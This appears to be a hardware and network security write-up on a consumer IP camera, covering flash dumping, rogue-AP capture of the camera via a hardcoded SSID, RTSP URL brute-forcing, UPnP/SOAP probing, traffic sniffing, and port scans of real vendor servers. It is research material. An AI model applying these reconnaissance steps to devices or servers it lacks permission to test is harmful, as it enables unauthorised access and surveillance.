ftiic010 ftiic010.0: irq 18, mapped at 84860000
I2C hangs detection thread started!

uses lib80211 for WiFi functionalities

After getting through booting and many applies of doing some OS tasks we have a shell. The shell will be harassed by intervalled output of WiFi Core that indicates it’s in STA mode and scans for a certain AP.

2.2 Getting Firmware

2.2.1 Dumping from System via SDCard

We can dump nearly the whole filesystem by simply copying it onto an sdcard.
It will be mounted as /mnt/disk1.

/mnt # mmc0: new high speed SDHC card at address e624
mmcblk0: mmc0:e624 SU08G 7.40 GiB 
 mmcblk0:
found removeable disk1 
mount  removeable disk1 OK 
dwDiscState = 2 

/# cp -r / /mnt/disk1/

Searching for interesting info bits in the file system

# grep -rli aes
npc/npc
patch/bin/wpa_supplicant
patch/lib/mt7601Usta_v2.ko
lib/modules/ms.ko

# grep -rli firmware
npc/npc
patch/bin/ifrename
patch/lib/mt7601Usta_v2.ko
gm/bin/busybox
gm/tools/ethtool

The directory npc with the executable npc seems to be very interesting:

/npc # ls
dhcp.script     minihttpd.conf  patch           txt             wPipe
gwellipc        mtd             pipe_create     upgfile_ok
img             npc             sound           version.txt

/npc # cat npc | grep aes
aes-128-ecb
aes-128-cbc
aes-128-ofb
aes-128-cfb
...
id-aes128-wrap
id-aes192-wrap
id-aes256-wrap
e_aes.c
aes key setup failed


/npc # cat npc | grep -i password
Password
PasswordType
RemotlySetPassword
Super_Password
*cESSID:%s,cPassword:%s,dwEncType = %d
challengePassword
...
Password Fail IP=%d Counter=%d dwPassword=%d
Guest Password verify OK 1...
Password verify fail 1...
Super Password 
super+manager Password 
Password verify OK1 ...
Password verify fail 1...

npc has a lot of strings in it related to encrypting and network authentication. It’s necessary to obtain this binary from the filesystem to examine it in detail. I will look into the npc binary in a additional gistfile: https://gist.github.com/herrfeder/883093ae93eaefba8950c00f6a6bbed8#file-sricam_upnp_npc-md

2.2.2 Dumping Flash via SPI

My initial concept was to use the Attify Badge with the description from the IOT Exploitation Manual with the tool spiflash (https://github.com/devttys0/libmpsse). As I own a Testclip for 8-pin DIP-Chips, I can simply attach it to the Flash Chip with the following pinning:

Testclip on the Flash Chip

Pinning of the Testclip Cable

Overview of SPI flashing with Attify Badge

It will sucessfully detect the Flash Chip probably indicated by the zeros. Because without attaching anything or the wrong pins it will show up “FF FF FF” instead (maybe it’s only indicating signal high on connected pin):

# ~/tools/libmpsse/src/examples
$ sudo python spiflash.py -i
[sudo] password for oit: 
FT232H Future Technology Devices International, Ltd initialized at 15000000 hertz
00 00 00 

Now I will try to dump it’s memory to a file. We need some information to do so like the address offset where the firmware image starts and the size of memory. We know from the booting process that the uBoot Partition starts at 0x10000 (int 65536) and the memory size is 16MiB (1610241024). So we can try to start the script with the right params:

# ~/tools/libmpsse/src/examples
$ sudo python spiflash.py -a 65536 -s 167510016 -r ip_cam.bin
FT232H Future Technology Devices International, Ltd initialized at 15000000 hertz
Reading 167510016 bytes starting at address 0x10000...saved to ip_cam.bin.

But when looking into the file, it only has 0x0000 in it:

# ~/tools/libmpsse/src/examples
$ hexdump ip_cam.bin 
0000000 0000 0000 0000 0000 0000 0000 0000 0000
*
9fc0000

After some research I saw that others struggled with the same problem:

https://github.com/Marzogh/SPIFlash/issues/37
https://www.ghostlyhaks.com/forum/rom-eeprom-bios-efi-uefi/64-can-t-dump-or-read-mx25l6406e-chip

I decided to give the Bus Pirate a try with the tool flashrom (https://www.flashrom.org/Bus_Pirate) as it’s supports the BusPirate directly. I got the BusPirate SPI Pinning:

SPI>v
Pinstates:
1.(BR)	2.(RD)	3.(OR)	4.(YW)	5.(GN)	6.(BL)	7.(PU)	8.(GR)	9.(WT)	0.(Blk)
GND	3.3V	5.0V	ADC	VPU	AUX	CLK	MOSI	CS	MISO
P	P	P	I	I	I	O	O	O	I	
GND	0.00V	0.00V	0.00V	0.00V	L	L	L	L	L	

and connected it to the Testclip, the following way:

Overview of SPI flashing with Buspirate

Using the command for flashrom to write the memory into file:

# ~/tools/
$ flashrom -V -p buspirate_spi:dev=/dev/ttyUSB0,spispeed=1M -r MX25L128.bin -c MX25L12835F/MX25L12845E/MX25L12865E

flashrom v0.9.9-r1954 on Linux 4.7.0-kali1-amd64 (x86_64)
flashrom is free software, get the source code at https://flashrom.org

flashrom was built with libpci 3.5.2, GCC 6.3.0 20170221, little endian
Command line (7 args): flashrom -V -p buspirate_spi:dev=/dev/ttyUSB0,spispeed=1M -r MX25L128.bin -c MX25L12835F/MX25L12845E/MX25L12865E
Calibrating delay loop... OS timer resolution is 1 usecs, 2605M loops per second, 10 myus = 11 us, 100 myus = 111 us, 1000 myus = 1025 us, 10000 myus = 10064 us, 4 myus = 5 us, OK.
Initializing buspirate_spi programmer
Detected Bus Pirate hardware v3b
Detected Bus Pirate firmware 5.10
Using SPI command set v2.
SPI speed is 1MHz
Raw bitbang mode version 1
Raw SPI mode version 1
The following protocols are supported: SPI.
Probing for Macronix MX25L12835F/MX25L12845E/MX25L12865E, 16384 kB: probe_spi_rdid_generic: id1 0xc2, id2 0x2018
Found Macronix flash chip "MX25L12835F/MX25L12845E/MX25L12865E" (16384 kB, SPI) on buspirate_spi.
Chip status register is 0x00.
Chip status register: Status Register Write Disable (SRWD, SRP, ...) is not set
Chip status register: Bit 6 is not set
Chip status register: Block Protect 3 (BP3) is not set
Chip status register: Block Protect 2 (BP2) is not set
Chip status register: Block Protect 1 (BP1) is not set
Chip status register: Block Protect 0 (BP0) is not set
Chip status register: Write Enable Latch (WEL) is not set
Chip status register: Write In Progress (WIP/BUSY) is not set
This chip may contain one-time programmable memory. flashrom cannot read
and may never be able to write it, hence it may not be able to completely
clone the contents of this chip (see man page for details).
Reading flash...

This process took very long and wasn’t really promising but after nearly an hour it finished and I was able to examine a firmware binary:

# ~/tools/
$ strings MX25L128.bin | grep -i gcc 
arm-unknown-linux-uclibcgnueabi-gcc (Buildroot 2012.02) 4.4.0 20100318 (experimental)
GcC\M
jGcc

I guess, due to low maximum sample rates of the BusPirate it will dump really slow. Link for the extracted binary: https://github.com/herrfeder/Offensive_IOT_Exploitation/blob/master/gist_files/ip_cam_firmware.bin

Some other interesting links for this purpose:

3. Acess over Wireless Interfaces and Network

3.1 Internal Communication

The UI experience of the App for communicating with the Cam is really bad and I wasn’t patient enough, to set up WiFi connectivity with the App. On first glance I suspected it would setup an open access point and I can simply connect to it but it doesn’t. There is some functionality to connect to another existent WiFi by capturing with the provided Smartphone App generated QR-Code. I took another way and examined the OS of the Cam to find out what it is up to:

/etc/network # cat interfaces 
auto lo

iface lo inet loopback

iface eth0 inet static
	address	172.19.78.3
	broadcast 172.31.255.255
	netmask 255.240.0.0
	gateway 172.19.78.2
	pre-up	/sbin/insmod /lib/modules/2.6.14/extra/ftmac100.ko
	post-down /sbin/rmmod ftmac100.ko

# no hints in the configuration on the interfaces

/etc # cat wpa_supplicant0.conf 
ctrl_interface=/etc/Wireless  
 network={ 
     ssid="Free-AP0"   
     key_mgmt=NONE  
  }
# but a wpa_supplicant conf with a given SSID  

As I set up an open AP with the SSID “Free-AP0” the Cam connects immediately to it.

 CH  1 ][ Elapsed: 6 s ][ 2017-08-17 18:16 ][ paused output                                        
                                                                                                       
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                        
 00:C0:CA:62:41:8F   -9 100       90       13    0   1  54   OPN              Free-AP0                  
                                                                                                        
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              
                                                                                                        
 00:C0:CA:62:41:8F  F8:0C:F3:FF:5F:6C   14   54 - 6      0       11       # Smartphone with App                               
 00:C0:CA:62:41:8F  20:F4:1B:5C:07:AD  -19    1 - 1      0        5       # IPCam                               

To set up open or WEP/WPA access points with internet access quickly, I recommend the little bashtool qw (https://github.com/file-not-found/qw) of a collegue of mine. Prequesities are hostapd and dnsmasque. Of course, you can do it with hostapd by bridging or routing the connectivity manually.

~/wlan # ./qw ap Free-AP0 wlan0       
Enter passphrase (leave blank for open network): 
Configuration file: /tmp/qw_1_hostapd.conf
Using interface wlan0 with hwaddr 00:c0:ca:62:41:8f and ssid "Free-AP0"
wlan0: interface state UNINITIALIZED->ENABLED
wlan0: AP-ENABLED 
wlan0: STA f8:0c:f3:ff:5f:6c IEEE 802.11: authenticated		# smartphone tries to connect
wlan0: STA f8:0c:f3:ff:5f:6c IEEE 802.11: associated (aid 1)
wlan0: AP-STA-CONNECTED f8:0c:f3:ff:5f:6c
wlan0: STA f8:0c:f3:ff:5f:6c RADIUS: starting accounting session C7E9972B18913018
Unsupported authentication algorithm (1)
handle_auth_cb: STA 20:f4:1b:5c:07:ad not found
Unsupported authentication algorithm (1)
handle_auth_cb: STA 20:f4:1b:5c:07:ad not found
wlan0: STA 20:f4:1b:5c:07:ad IEEE 802.11: authenticated		# IPCam tries to connect
wlan0: STA 20:f4:1b:5c:07:ad IEEE 802.11: associated (aid 2)
wlan0: AP-STA-CONNECTED 20:f4:1b:5c:07:ad
wlan0: STA 20:f4:1b:5c:07:ad RADIUS: starting accounting session 611E6C4DC8EFDE0C

As the IPCam has network connection we will take the first step of network recon and scan the IPCam itself:

# nmap 10.0.0.21

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-15 15:10 CEST
Nmap scan report for 10.0.0.21
Host is up (0.022s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
554/tcp  open  rtsp	# streaming video data locally
5000/tcp open  upnp	# connect to distanced web server, will probably open port on router
MAC Address: 20:F4:1B:5C:07:AD (Shenzhen Bilian electronic)

As it has an open upnp port I suspected it to open a port on a router, when it is allowed to. I checked this out on a FritzBox but it doesn’t open a port automatically.

There is a telnet daemon on the device. It seems to work:

# nmap 10.0.0.21

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-15 15:23 CEST
Nmap scan report for 10.0.0.21
Host is up (0.20s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
23/tcp   open  telnet
554/tcp  open  rtsp
5000/tcp open  upnp
MAC Address: 20:F4:1B:5C:07:AD (Shenzhen Bilian electronic)

3.2 Trying Interacting/Accessing the provided services

To get a more detailed view of provided services we will use nmap again to fingerprint the previous found ports and services:

# nmap --script rtsp-url-brute -p 554 10.0.1.25                                                                                                               :(

PORT    STATE SERVICE
554/tcp open  rtsp
| rtsp-url-brute: 
|   discovered: 
...

|     rtsp://10.0.1.25/cam4/mpeg4
|     rtsp://10.0.1.25/Video?Codec=MPEG4&Width=720&Height=576&Fps=30
|     rtsp://10.0.1.25/cam1/onvif-h264
...
|     rtsp://10.0.1.25/cgi-bin/viewer/video.jpg?resolution=640x480
|     rtsp://10.0.1.25/h264Preview_01_sub
|     rtsp://10.0.1.25/h264_vga.sdp
...
|     rtsp://10.0.1.25/nphMpeg4/g726-640x480
|     rtsp://10.0.1.25/nphMpeg4/nil-320x240
|     rtsp://10.0.1.25/onvif-media/media.amp
|     rtsp://10.0.1.25/mpeg4unicast
|     rtsp://10.0.1.25/onvif/live/2
|     rtsp://10.0.1.25/onvif1
|     rtsp://10.0.1.25/onvif2
...
|     rtsp://10.0.1.25/vis
|     rtsp://10.0.1.25/video1+audio1
|     rtsp://10.0.1.25/wfov
|_    rtsp://10.0.1.25/user=admin_password=tlJwpbo6_channel=1_stream=0.sdp?real_stream



# nmap --script rtsp-methods -p 554 10.0.1.25

PORT    STATE SERVICE
554/tcp open  rtsp
|_rtsp-methods: OPTIONS, DESCRIBE, SETUP, TEARDOWN, PLAY, PAUSE, GET_PARAMETER, SET_PARAMETER,USER_CMD_SET

Many of these detected URL’s doesn’t work. rtsp://10.0.1.25/onvif1 will give definitely a stream.

This seems very interesting but doing research for it doesn’t bring up as many attack vectors and info material as UPNP does. The services presented on this port suffers often evil vulnerabilties. It’s more critical that UPNP devices often forces the gateway to open ports independently to connect to backend or remote servers of the manufacturers or other third parties. Many DDos attacks in the past with IOT involved used open UPNP ports to control them. Footprinting this UPNP port reveals it’s presented service and version:

# nmap -sV -p 5000 10.0.1.25

PORT     STATE SERVICE VERSION
5000/tcp open  soap    gSOAP 2.8

So my first action was to speak with popular UPNP hacker tools to the interface but didn’t respond:

# miranda -i wlan0 -v

Binding to interface wlan0 ...

Verbose mode enabled!
upnp> msearch

Entering discovery mode for 'upnp:rootdevice', Ctl+C to stop...

Metasploit, the famous exploiting framework includes some UPNP attack vectors for exploits especially for routers. To act as a real noob I will fire up some of these scripts to hope for any reaction without any knowledge of the underlying service “gSoap”. Obviously this didn’t result in any success. Metasploit includes another UPNP ssdp scanner but it won’t triggers anythin neither.

msf > use auxiliary/scanner/upnp/ssdp_msearch
msf auxiliary(ssdp_msearch) > set RHOSTS 10.0.1.25/32
msf auxiliary(ssdp_msearch) > run

[*] Sending UPnP SSDP probes to 10.0.1.25->10.0.1.25 (1 hosts)
[*] No SSDP endpoints found.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As it won’t broadcasting anything to it’s environment it has to be an API I have to trigger somehow. So I tried to access the port it via Webbrowser at first. It shows a SOAP XML-API that doesn’t want’s to be served with GET requests:

<SOAP-ENV:Fault xmlns:SOAP-ENV="http://www.w3.org/2003/05/soap-envelope" xmlns:SOAP-ENC="http://www.w3.org/2003/05/soap-encoding" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsdd="http://schemas.xmlsoap.org/ws/2005/04/discovery" xmlns:chan="http://schemas.microsoft.com/ws/2005/02/duplex" xmlns:wsa5="http://www.w3.org/2005/08/addressing" xmlns:xmime="http://tempuri.org/xmime.xsd" xmlns:xop="http://www.w3.org/2004/08/xop/include" xmlns:tt="http://www.onvif.org/ver10/schema" xmlns:wsrfbf="http://docs.oasis-open.org/wsrf/bf-2" xmlns:wstop="http://docs.oasis-open.org/wsn/t-1" xmlns:wsrfr="http://docs.oasis-open.org/wsrf/r-2" xmlns:tdn="http://www.onvif.org/ver10/network/wsdl" xmlns:tds="http://www.onvif.org/ver10/device/wsdl" xmlns:tev="http://www.onvif.org/ver10/events/wsdl" xmlns:wsnt="http://docs.oasis-open.org/wsn/b-2" xmlns:tptz="http://www.onvif.org/ver20/ptz/wsdl" xmlns:trt="http://www.onvif.org/ver10/media/wsdl">
<faultcode>SOAP-ENV:Client</faultcode>
<faultstring>HTTP GET method not implemented</faultstring>
</SOAP-ENV:Fault>

Now I need to get to know how to communicate with this api. This link can help: http://forums.opto22.com/t/how-to-send-soap-messages/951/9 I need to send POST requests with a XML string in SOAP format. In addition I was searching for “soap” string in the filesystem, it will reveal that the binary npc holds the gSoap service and used headers and SOAP elements:

# strings npc | grep -i soap 
SOAP-ENV
http://www.w3.org/2003/05/soap-envelope
http://schemas.xmlsoap.org/soap/envelope/
SOAP-ENC
...
gSOAP Web Service
gSOAP/2.8
wsa5:SoapAction
SOAP-ENC:id
SOAP-ENC:position
...
xmlns:SOAP-RPC
SOAP-ENC:ref
application/xop+xml; charset=utf-8; type="application/soap+xml"
SOAPAction
SOAP-ENC:Array
...
no master socket in soap_accept()
accept failed in soap_accept()
setsockopt SO_RCVBUF failed in soap_accept()
setsockopt TCP_NODELAY failed in soap_accept()
SOAP-ENC:root

There are interesting strings like “xmlns:SOAP-RPC” and “wsa5:SoapAction” which leads to implemented methods, I guess. As I know I have to send POST requests with attached XML content I can easily craft such a request with curl:

curl -H "Content-Type: text/xml; charset=utf-8" -H "SOAPAction:" -d @soap_req_01.txt -X POST http://10.0.1.25:5000

With the example soap request:

# cat soap_req_01.txt 

<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
  <SOAP-ENV:Envelope
   SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
   xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
   xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
   xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"
   xmlns:xsd="http://www.w3.org/1999/XMLSchema">
	<SOAP-ENV:Body>
		<ns1:doubleAnInteger
		 xmlns:ns1="urn:MySoapServices">
			<param1 xsi:type="xsd:int">123</param1>
		</ns1:doubleAnInteger>
	</SOAP-ENV:Body>
  </SOAP-ENV:Envelope>

I tried a lot of different ones and it will result in errors like “Method not implemented” as I don’t know the used methods. I don’t know how to craft the headers for the methods as I don’t have much knowledge about SOAP API’s and it seems to be not the easiest API especially when not knowing the used methods.

There was released a quite fresh Exploit “Devil’s Ivy” of the service gSoap in several versions. This will be handled in a extra gistfile: https://gist.github.com/herrfeder/883093ae93eaefba8950c00f6a6bbed8#file-sricam_upnp_npc-md http://blog.senr.io/devilsivy.html

3.3 External Communication

As I suspect an encrypted connection between IPCam, Smartphone and Backend Server, we need to sniff directly on the IPCam or the smartphone. I guess, it’s much easier to setup raw sniffing on a rooted Android powered mobile phone. The rooting is necessary for sniffing raw traffic on the network. I downloaded tcpdump for Android (http://www.androidtcpdump.com/) and load it onto the phone. For placing and executing an external binary are only a few places appropriate in the android file system. You can use /data/local/tmp or /sdcard/tmp or maybe some other. With adb we can control our Phone now.

$ adb shell		#opening shell on android phone
shell@mako:/ $ su
root@mako:/data/local/tmp # ./tcpdump -n -s 0 -w ipcam_cap                   
tcpdump: listening on wlan0, link-type EN10MB (Ethernet), capture size 262144 bytes
^C16598 packets captured
16598 packets received by filter
0 packets dropped by kernel
root@mako:/data/local/tmp # ls
hexdump.bin
ipcam_cap
tcpdump

3.3.1 Communication between Mobile Phone and IPCam

I was trying to trigger many activities in the communication between App and IPCam to get interesting traffic. There was some interesting traffic. In following screenshots the App activity screenshots will be paired with screenshots of interesting packets. To filter all the Android and Google Stuff it’s useful to filter some IP’s. I use wireshark for this:

Communication Smartphone IPCam

not ip.addr == 172.217.22.99 && not ip.addr == 216.58.205.0/24 && ip.addr == 10.0.0.0/24

Answer for existing login

Add Friend / Add camera to personal dash

After adding => Get friends list

Answer for existing login

Add friend capture

Reply for existing login

Get friends list

Delete friend

Get Version

Reply for version

The first bad intention of the security architecture is using only plain HTTP communication. They are “secured” by a Session ID and some kind of encryption in the payloads.

3.3.2 Firmware Update

The app delivers the possibility of doing a firmware update of the IPCam. Of course, I captured this: Firmware Upgrade But there isn’t any obvious activity in the file, that would point out a firmware upgrade. Only many udp traffic between smartphone and IPCam. Following this UDP stream over the whole capture:

`...}E.k............4...`...}E.k............4...`...}E.k............4...`...~E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`...~E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... .......	...`....E.k.... .......
...`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... .......!...`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... ....... ...`....E.k.... .......!...`....E.k.... ......."...`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... ....... ...`....E.k.... .......!...`....E.k.... ......."...`....E.k.... ...........`....E.k.... .........dm..`....E.k............4...`....E.k............4...`....E.k............4...`....E.k............4...`....E.k............4...`....E.k............4...`....E.k............4...`....E.k............4...`....E.k............4...`....E.k.... .......(...`....E.k.... .......)...`....E.k.... .......*...`....E.k.... .......+...`....E.k.... .......,...`....E.k.... .......-...`....E.k.... ...........`....E.k.... ......./...`....E.k.... .......0...`....E.k.... .......1...`....E.k.... .......2...`....E.k.... .......3...`....E.k.... .......)...`....E.k.... .......*...`....E.k.... .......+...`....E.k.... .......,...`....E.k.... .......-...`....E.k.... ...........`....E.k.... ......./...`....E.k.... .......0...`....E.k.... .......1...`....E.k.... .......2...`....E.k.... .......3...`....E.k.... .......*...`....E.k.... .......+...`....E.k.... .......,...`....E.k.... .......-...`....E.k.... ...........`....E.k.... ......./...`....E.k.... .......0...`....E.k.... .......1...`....E.k.... .......2...`....E.k.... .......3...`....E.k.... .......4...`....E.k.... .......5...`....E.k.... .......5...`....E.k.... .......5...`....E.k.... .......6...`....E.k.... .......5...`....E.k.... .......6...`....E.k.... .......5...`....E.k.... .......6...`....E.k.... .......7...`....E.k.... .......5...`....E.k.... .......6...`....E.k.... .......7...`....E.k.... .......8...`....E.k.... .......N...`....E.k.... .......I...`....E.k.... .......J...`....E.k.... .......K...`....E.k.... .......L...`....E.k.... .......M...`....E.k.... .......N...`....E.k.... .......O...`....E.k.... .......J...`....E.k.... .......K...`....E.k.... .......L...`....E.k.... .......M...`....E.k.... .......N...`....E.k.... .......O...`....E.k.... .......J...`....E.k.... .......K...`....E.k.... .......L...`....E.k.... .......M...`....E.k.... .......N...`....E.k.... .......O...`....E.k.... .......P...`....E.k.... .......Q...`....E.k.... .......Q...`....E.k.... .......R...`....E.k.... .......Q...`....E.k.... .......R...`....E.k.... .......S...`....E.k.... .......S...`....E.k.... .......T...`....E.k.... .......T...`....E.k.... .......U...`....E.k.... .......U...`....E.k.... .......U...`....E.k.... .......V...`....E.k.... .......U...`....E.k.... .......V...`....E.k.... .......W...`....E.k.... .......W...`....E.k.... .......W...`....E.k.... .......em..`...}E.k............4...`...}E.k............4...`...}E.k............4...`...~E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`...~E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... ...........`....E.k.... .......	...`....E.k.... .......

As the file is to small for including a firmware stream and examining this repeatedly structure something has to went wrong on capturing the firmware upgrade.


### 3.3.3 Remote Website for accessing IPCam via Internet

Applying more filter to see communication between Laptop and the remote feature on videoipcamera.cn/view. Requires Internet Explorer to use it. There is a lot of traffic with three participants, so I have to use multiple rules and append only the file with the already filtered packets:
[Communication AP Laptop prefiltered](https://github.com/herrfeder/Offensive_IOT_Exploitation/blob/master/gist_files/access_point_cap_laptop_10.0.1.36_website_101.1.17.22_filtered.cap)
```bash
not ip.addr == 172.217.22.99 && not ip.addr == 216.58.205.234 && ip.addr == 101.1.17.22 && ip.addr == 10.0.1.36 && http.request

This will reveal a lot of GET requests to videoipcamera.cn and a binary setup.exe on http://videoipcamera.cn/view/setup.exe. This is necessary to use the cam-client on a PC. By the way, installing and starting it on Windows 10 and Windows 7 Internet Explorer will kill Internet Explorer.

Internet Explorer crashes on login attempt

It will install some files into the directory C:Programme/Viewer_IPCam(SDL2.dll,Viewer.ocx). SDL2.dll won’t reveal anything interesting with a short look in IDA Disassembler:

Viewer.ocx has some interesting strings in it that will reveal some new type of requests to the server:

Put that into a list with the new info:

Viewer  1   327681  -1  39  /   
http:// DomainList  500 404 29  23  &Language=  &AppName=   &AppOS= &AppOS  &AppVersion=    &AppVersion 
Users/LoginCheck.ashx   &DomainList=    &Pwd=   VersionFlag=1&User= 
Users/Logout.ashx   &SessionID= UserID= 
Users/AddFriend.ashx    &MonitorPwd=    &RemarkName=    &Groupname= &FriendID=  
Users/DeleteFriend.ashx &DelFromHisList=0   Users/GetFriendList.ashx    &Type=  
Users/PhoneCheckCode.ashx   &PhoneNO=   CountryCode=    
Users/RegisterCheck.ashx    &IgnoreSafeWarning= &VerifyCode=    &CountryCode=   &Email= &RePwd= VersionFlag=1&Pwd=  
Users/modifyFriendRemarkName.ashx   &OldRemarkName= &NewRemarkName= 
Users/ModifyMonitorPwd.ashx {"error_code":"100100","error":"ÕÒ²»µ½¿ÉÓÃ·þÎñÆ÷"}  {"error_code":"100101","error":"·¢ËÍÇëÇóÊ§°Ü"}  ðíHTTP    
  Host:   Content-Length: %ld
   User-Agent: Neeao/4.0
 Accept-Encoding: gzip, default
    Accept-Language: en-us
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
  HTTP/1.0
 POST    GET     Content-Type: application/x-www-form-urlencoded

This will reveal some common HTTP requests and the related attributes that has to be sent with the request. I tried several ones with random filling of the known attributes which only resulted in errors.

3.3.4 Direct Communication between IPCam and servers

Using this rule we can filter only the direct communication of the IPCam:

IPCam Communication to Server

ip.addr == 10.0.1.25

It’s obvious, that the exchanged payloads are encrypted somehow as I’m not able to read it’s content directly or base64 etc. I guess the encrypting for these UDP messages will happen for the IPCam in the npc binary too. It has to be some static encryption as many bit chunks will repeat often.

3.3.5 Collecting Information

I collected a list of participating servers with IP and often used requests:

videoipcamera.com	218.30.35.92	POST /Users/GetFriendList.ashx	POST /Users/AddFriend.ashx
videoipcamera.cn	101.1.17.22	POST /Users/GetFriendList.ashx	POST /Users/AddFriend.ashx
upg1.videoipcamera.cn	218.30.35.92	GET /00/06/latestversion.asp
p2p1.videoipcamera.cn	146.0.238.42
api1.videoipcamera.cn	101.1.17.22	POST /Users/LoginCheck.ashx
api2.videoipcamera.cn	218.30.35.92	POST /Users/LoginCheck.ashx
p2p2.videoipcamera.com	218.30.35.92
api3.videoipcamera.cn	101.1.17.22	POST /Users/LoginCheck.ashx
p2p6.videoipcamera.com	101.1.17.22
api4.videoipcamera.com	146.0.238.42	POST /Users/LoginCheck.ashx	UDP Port 8000	UDP Port 51880
p2p3.videoipcamera.com	146.0.238.42
p2p4.videoipcamera.com	146.0.238.42
	92.42.106.94	UDP Port 4000	UDP Port 4001
p2p5.videoipcamera.com	103.41.127.199	UDP Port 51880	UDP Port 51881
104-250-152-26.static.gorillaservers.com	104.250.152.26	UDP Port 8000	UDP Port 8001

There are some other servers participated talking directly to the IPCam and the Phone over UDP. We can identify some often used UDP Ports on our devices:

Phone => IPCam UDP to 51880
IPCam => Phone UDP to 5188{0,1,2} Please be cautious, when intended to scan unkown web servers. Your actions could be understand as an attack. ```bash $ nmap -sU -p8000 api4.videoipcamera.com

PORT STATE SERVICE 8000/udp open|filtered irdmi # Intel Remote Desktop Management Interface

$ nmap -sU -p4000 92.42.106.94

PORT STATE SERVICE 4000/udp open|filtered icq # conferencing protocol

$ nmap -sU -p4001 92.42.106.94

PORT STATE SERVICE 4001/udp open|filtered newoak

I guess this UDP ports are used to control the IPCam and the app remotely.

```bash
$ nmap 92.42.106.94                                                   

PORT     STATE  SERVICE
3389/tcp open   ms-wbt-server
5060/tcp closed sip
5061/tcp closed sip-tls


$ nmap 103.41.127.199

PORT      STATE    SERVICE
80/tcp    open     http
135/tcp   filtered msrpc
139/tcp   filtered netbios-ssn
445/tcp   filtered microsoft-ds
593/tcp   filtered http-rpc-epmap
1025/tcp  filtered NFS-or-IIS
3389/tcp  open     ms-wbt-server
6129/tcp  filtered unknown
49152/tcp open     unknown
49153/tcp open     unknown
49154/tcp open     unknown
49155/tcp open     unknown
49156/tcp open     unknown
49157/tcp open     unknown
49165/tcp open     unknown


$ host 104.250.152.26
26.152.250.104.in-addr.arpa domain name pointer 104-250-152-26.static.gorillaservers.com.

$ nmap 104.250.152.26

PORT      STATE    SERVICE
80/tcp    open     http
135/tcp   filtered msrpc
139/tcp   filtered netbios-ssn
445/tcp   filtered microsoft-ds
593/tcp   filtered http-rpc-epmap
1025/tcp  filtered NFS-or-IIS
6129/tcp  filtered unknown
8080/tcp  open     http-proxy
9090/tcp  open     zeus-admin
33899/tcp open     unknown
49152/tcp open     unknown
49153/tcp open     unknown
49154/tcp open     unknown
49155/tcp open     unknown
49158/tcp open     unknown
49159/tcp open     unknown

Using GeoLocation services the server 104.250.152.26 is the only one that isn’t hosted in China. Regarding the similiar port fingerprint and exchanging similiar UDP messages with mobile phone and IPCam I can determine that this server is involved in the infrastructure. We can see multiple server with interesting port fingerprint and interesting UDP ports, too. Without strong assumption of vulnerabilities, I won’t start to attack any server. Collecting some encrypted Info bits, that may will help me on reversing App and firmware:

Passwort: <secret> => 891A54C4E2EAB52D01C6FBF85A4C143E  # hashing for passwort
UserID: 0732910 => -2146750738   # conversion for UserID

Encrypted UDP: 10.0.0.21 (IPCam) -> 10.0.0.27 (Smartphone)
00:00:00:02:00:00:00:01:00:00:00:50:00:00:00:01:00:09:41:38:00:00:00:07:00:00:00:01:0e:00:00:0f:00:30:61:72:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:2f:00:00:00:00:00:00:00:00

Encrypted UDP: 10.0.0.27 (Smartphone) -> 146.0.238.42
0c:05:03:00:ee:b6:b9:67:ee:2e:0b:80:3c:88:2a:1d:4e:25:36:4f:9a:44:28:8e:00:00:00:00:e4:74:85:3b

Encrypted UDP: 146.0.238.42 -> 10.0.0.27 (Smartphone)
0d:01:00:00:9a:44:28:8e:b1:e8:c6:af:09:00:00:00:5c:2a:6a:5e:0f:a0:01:01:92:00:ee:2a:ca:a8:01:01:68:fa:98:1a:1f:40:01:01:67:29:7f:c7:ca:a8:01:01:dc:e7:8e:89:22:53:03:01:da:1e:23:5c:22:53:03:01:92:00:ee:2a:22:53:03:01:da:1e:23:5c:2b:5c:04:01:92:00:ee:2a:2b:5c:04:01

This UDP packet payloads are exchanged between smartphone and multiple servers (146.0.238.42,103.41.127.199,104.250.152.26):

0103caa80a00011eee2e0b80b486ca4d073e19397593056b8675f8030001000051000000
0103caa80a00011eee2e0b8024ac620c080cc0b07aa1dce26f79f8030001000051000000
0203caa800000000ee2e0b80b486ca4d073e19397593056b8675f80300010000010000000000000000000000
0203caa800000000ee2e0b8024ac620c080cc0b07aa1dce26f79f80300010000010000000000000000000000
0103caa80a00011eee2e0b806285763d44675edb36ca4289587df8030001000051000000
